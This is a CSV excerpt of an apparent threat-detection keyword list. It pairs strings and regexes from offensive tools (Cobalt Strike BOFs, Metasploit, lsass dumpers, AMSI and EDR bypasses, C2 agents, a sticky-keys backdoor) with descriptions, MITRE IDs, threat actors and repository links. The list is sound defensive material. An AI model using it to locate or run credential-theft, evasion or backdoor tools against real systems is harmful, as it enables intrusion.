"*ATShell (%s@%s)> *",".{0,1000}ATShell\s\(\%s\@\%s\)\>\s.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#content","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","34216"
"*ATT_BITLOCKER_MSFVE_RECOVERY_PASSWORD*ATTm591788*",".{0,1000}ATT_BITLOCKER_MSFVE_RECOVERY_PASSWORD.{0,1000}ATTm591788.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","34217"
"*--attack nightmare*",".{0,1000}\-\-attack\snightmare.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","34218"
"*--attack spoolsample*",".{0,1000}\-\-attack\sspoolsample.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","34219"
"*Attack_AmsiOpenSession.ps1*",".{0,1000}Attack_AmsiOpenSession\.ps1.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","N/A","8","4","377","67","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z","34220"
"*Attack_AmsiScanBuffer.ps1*",".{0,1000}Attack_AmsiScanBuffer\.ps1.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","N/A","8","4","377","67","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z","34221"
"*attacker.shadowCredObjects.Count*",".{0,1000}attacker\.shadowCredObjects\.Count.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","34222"
"*--attacker-page *",".{0,1000}\-\-attacker\-page\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 -  T1101 -  T1201 -  T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","34223"
"*AttackerSetup(windows).exe*",".{0,1000}AttackerSetup\(windows\)\.exe.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","N/A","1","17","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z","34224"
"*AttackerSetup.py*",".{0,1000}AttackerSetup\.py.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","N/A","1","17","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z","34225"
"*AttackerSetup4linux*",".{0,1000}AttackerSetup4linux.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","#linux","N/A","N/A","1","17","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z","34226"
"*Attacking domain controller *",".{0,1000}Attacking\sdomain\scontroller\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","34227"
"*AttackSurfaceMapper-master*",".{0,1000}AttackSurfaceMapper\-master.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","34228"
"*AttackTeamFamily*-bof-toolset*",".{0,1000}AttackTeamFamily.{0,1000}\-bof\-toolset.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34229"
"*Attemping WPAD, LLMNR, and NBTNS poisoning*",".{0,1000}Attemping\sWPAD,\sLLMNR,\sand\sNBTNS\spoisoning.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","34230"
"*attempt to randomize script without setting all randomizations methods*",".{0,1000}attempt\sto\srandomize\sscript\swithout\ssetting\sall\srandomizations\smethods.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","34231"
"*Attempted to spawn a socks proxy server at 0.0.0.0:*",".{0,1000}Attempted\sto\sspawn\sa\ssocks\sproxy\sserver\sat\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","34232"
"*Attempting connection from 0.0.0.0:*",".{0,1000}Attempting\sconnection\sfrom\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","34233"
"*Attempting Risky Operation: Opening Handle Directly to Lsass Process*",".{0,1000}Attempting\sRisky\sOperation\:\sOpening\sHandle\sDirectly\sto\sLsass\sProcess.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","34234"
"*Attempting to add Sticky Keys backdoor to registry*",".{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","34235"
"*Attempting to add Sticky Keys backdoor to registry*",".{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","34236"
"*AttifyOS*",".{0,1000}AttifyOS.{0,1000}","offensive_tool_keyword","attifyos","AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. The new version is based on Ubuntu 18.04 64-Bit - that also means that you'll receive updates for this version till April 2023.","T1559 - T1565 - T1210 - T1189 - T1110","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/adi0x90/attifyos","1","0","N/A","N/A","N/A","10","982","169","2021-08-26T13:31:13Z","2017-07-17T01:40:25Z","34237"
"*attrib +r +a +s +h ""%PROGRAMFILES%\Media player"" /S /D*",".{0,1000}attrib\s\+r\s\+a\s\+s\s\+h\s\""\%PROGRAMFILES\%\\Media\splayer\""\s\/S\s\/D.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","34239"
"*au.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}au\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","34249"
"*Auditcleaner.*",".{0,1000}Auditcleaner\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers anti forensic - cleans up audit.log","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","34251"
"*Augustus-main.zip*",".{0,1000}Augustus\-main\.zip.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/TunnelGRE/Augustus","1","1","N/A","N/A","6","2","131","26","2024-07-27T14:47:45Z","2023-08-21T15:08:40Z","34257"
"*ausecwa/bof-registry*",".{0,1000}ausecwa\/bof\-registry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","34258"
"*auth.dev.pico.sh*",".{0,1000}auth\.dev\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","34260"
"*auth/cc2_ssh.*",".{0,1000}auth\/cc2_ssh\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","34261"
"*Authenticated returns if the Agent is authenticated to the Merlin server or not*",".{0,1000}Authenticated\sreturns\sif\sthe\sAgent\sis\sauthenticated\sto\sthe\sMerlin\sserver\sor\snot.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","34263"
"*Author => Hossam Ehab / EDR/AV evasion tool*",".{0,1000}Author\s\=\>\sHossam\sEhab\s\/\sEDR\/AV\sevasion\stool.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","34264"
"*Author: @haus3c*",".{0,1000}Author\:\s\@haus3c.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","34265"
"*Author: @ShitSecure*",".{0,1000}Author\:\s\@ShitSecure.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","34266"
"*Author: Hossam Ehab - facebook.com/0xHossam*",".{0,1000}Author\:\sHossam\sEhab\s\-\sfacebook\.com\/0xHossam.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","34267"
"*Author: Yehuda Smirnov (X: @yudasm_ BlueSky: @yudasm.bsky.social)*",".{0,1000}Author\:\sYehuda\sSmirnov\s\(X\:\s\@yudasm_\sBlueSky\:\s\@yudasm\.bsky\.social\).{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","#content","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","34268"
"*auto_brute.rc*",".{0,1000}auto_brute\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34269"
"*auto_exploit_blank_password*",".{0,1000}auto_exploit_blank_password.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","34270"
"*auto_pass_the_hash.*",".{0,1000}auto_pass_the_hash\..{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","34271"
"*auto_pass_the_hash.rc*",".{0,1000}auto_pass_the_hash\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34272"
"*auto_target_linux.rb*",".{0,1000}auto_target_linux\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34273"
"*auto_target_windows.rb*",".{0,1000}auto_target_windows\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34274"
"*autobloody -*",".{0,1000}autobloody\s\-.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","34275"
"*autobloody.py*",".{0,1000}autobloody\.py.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","34276"
"*autobloody-main*",".{0,1000}autobloody\-main.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","34277"
"*AutoBypass.ps1*",".{0,1000}AutoBypass\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","34278"
"*AutoC2.sh*",".{0,1000}AutoC2\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34279"
"*AutoC2/All.sh*",".{0,1000}AutoC2\/All\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34280"
"*AutoC2/C2*",".{0,1000}AutoC2\/C2.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34281"
